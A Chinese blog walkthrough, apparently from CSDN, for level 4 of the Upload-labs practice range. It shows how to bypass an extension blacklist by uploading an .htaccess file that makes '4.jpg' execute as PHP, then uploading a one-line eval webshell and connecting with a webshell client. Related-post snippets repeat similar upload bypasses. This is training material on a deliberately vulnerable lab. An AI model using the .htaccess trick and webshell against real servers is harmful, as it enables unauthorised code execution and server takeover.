Upload LABS Pass-4

最新推荐文章于 2024-04-06 16:19:48 发布
最新推荐文章于 2024-04-06 16:19:48 发布
阅读量1.5w 收藏 2
点赞数 4
分类专栏: Upload LABS 靶场通关教程 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118423723
版权

第四关在后端使用了黑名单,并过滤了空格,点,以及大小写 , 但未过滤 .htaccess(分布式配置) , 固此关卡使用 分布式配置文件绕过黑名单

准备一个 .htaccess 文件 , 内容如下

<FilesMatch "4.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

准备一个 4.jpg 文件 , 内容为一句话木马

<?php eval($_POST[-7]);?>

先上传 .htaccess 文件 , 该文件可使其所在目录下的所有文件以php文件执行

再上传 4.jpg 文件 , 此文件会被当做php文件执行

右键 复制文件路径 , 并使用菜刀链接

 ​​​​​​​​​​​​​​

 链接成功

 

士别三日wyx
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
文件上传之upload-labs(一)
01-08
文件上传漏洞 通过上传攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更加能理解和掌握; 使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传用dvwa好一点,这个用来训练和复习,但是不得不说的是,至少前十题那个套路实在是没意思,下面是思维导图: 废话少说直接进入: 进入是这样的,开始训练吧。 pass-01: 新建一个PHP文件,使用一句话木马上传 提示我们文件类型不符合要求要上
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
upload-labs卡4(黑名单点空格绕过或htaccess绕过)通思路
zyh1588的博客
11-09 779
小白回顾文件上传靶场第四
全网最全upload_labs通过教程,有详细解题思路
最新发布
m0_63615772的博客
04-06 738
没有经过过滤,先判断合不合法加. 加.空格 都可以绕过前面的各种方法总结。
upload-labs 1-21思路教程
weixin_45612728的博客
06-15 1460
upload-labs新版1-21的全部思路以及过指引
第四周:upload-labs通
qq_65185949的博客
12-18 765
filename那一栏的后缀改为.php,改后点击左上角forward放包,连续点击直到放完(放包过程中若未闭病毒拦截软件,则请求可能会被拦截,要提前闭防病毒软件),完成后掉burp拦截,闭火狐代理。打开upload网站,点击第一,看到上传图片,我们把写好的一句话木马即PHP文件上传,发现无法上传,且拦截迅速,则第一为前端拦截,我们可以通过抓包改包来通。如“. php. . ”2.开启burp拦截,开启火狐代理,然后点击上传,看到页面无法打开,即抓到包了,点开burp,将。
upload-labs靶场通全网最详细
m0_68976043的博客
03-14 1695
我们本的任务是上传一个webshell,当我们上传php文件的时候,会直接阻止我们去看看很明显这个是对前端进行验证的代码那我们直接进入开发者模式可以清楚的看到checkFile()【文件类型校验函数】那就很简单了,我们删除校验改为true,即可成功上传我们的php上传成功:看看结果第二种方法,我们可以使用burp抓包实现,先上传一个.jpg正常的文件但是内容是一句话木马,抓包后修改后缀放行也可实现第三种方法:闭网页的js攻能,这样js也被我们绕过了我们现在重新进行提交。
upload-labs pass-04
weixin_50339082的博客
06-22 118
upload-labs pass-04 Pass-04 先看一下源码(黑名单绕过–.htaccess): $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht"
Upload-labs Pass-04 .htaccess文件上传
baynk的博客
11-03 1990
Pass-04 .htaccess文件上传 0x01 过程 传php时,只有此文件不允许上传字样,burpsuite改个名查看一下。 和上有点像,但是好像没有被重命名,可以试试apache的解析漏洞,test.php.xxxx.yyy这种不认识的后缀名会从右往左依次解析,不认识就往左移一个,像这个就会当作test.php处理,来,尝试一下。 访问一下,可以成功解析。 这就没了?不,我觉得...
upload-labs靶场-Pass-04-思路以及过程
weixin_44257023的博客
01-14 1177
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-master-pass4
diemozao8175的博客
08-17 285
第四卡过滤了很多后缀名,但是没有过滤.htaccess 新建一个.htaccess的文件 内容为 1 SetHandler application/x-httpd-php 然后上传 这样该目录的文件都可以解析成php 在制作一张图片马 /b 是表示二进制文件 /a是表示ascll码文本文件 然后合并 在上传图片马,验证是否上传成功 ...
upload-labs第四 pass-04 htaccess绕过
weixin_44522540的博客
02-26 4624
五、pass-04 htaccess绕过 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".p
安装upload-labs
10-22
安装upload-labs
upload-labs19-20以及总结1
08-08
第一步:直接上传php文件,保存名称填成PHP第二步:抓包分析可以看到filename是文件本来的名称,而save_name是传递的参数,此处改为PHP可以绕过
upload-labs-env.rar
02-24
本文档是文件上传的闯环境,解压后,双击允许modify_path.bat文件,开启phpstudy,即可进行实验。 免责声明 本文档供学习,请使用者注意使用环境并遵守国家相法律法规! 由于使用不当造成的后果上传者概不负责...
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用卡制,一共21,由易到难,适合刚接触该漏洞的新手巩固练习
Upload-labs 1-20靶场通攻略(全网最全最完整)
dragon的博客
03-15 2162
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为php 当 PHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
upload-labs-04
m0_51998814的博客
04-04 5534
一、前言 在本中涉及到Apache服务器的一个配置文件.htaccess。该文件是Apache服务器下的一个配置文件,主要负责相目录下的网页配置,在一个特定的文档目录中放置一个包含一个或多个指令的文件来对网页进行配置。 二、环境 靶场:upload-labs 三、思路 打开第四,查看提示,发现被过滤了好多东西,但是没有过滤.htacces文件。 那么我们就可以先上传一个.htacces文件,修改配置,让服务器把指定的文件当做PHP文件来执行。 <FilesMatch ..
文件上传漏洞upload-libs pass4
CMACCKK
02-18 313
文件上传漏洞upload-libs pass3
upload-labs/Pass-07 漏洞复现
09-08
对于 upload-labs 的 Pass-07 漏洞复现,我可以给你一些指导。首先,请确保你已经下载并配置好了 upload-labs 的环境。 Pass-07 是一个文件上传漏洞的挑战,目标是成功绕过上传限制并执行恶意代码。 以下是一般的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值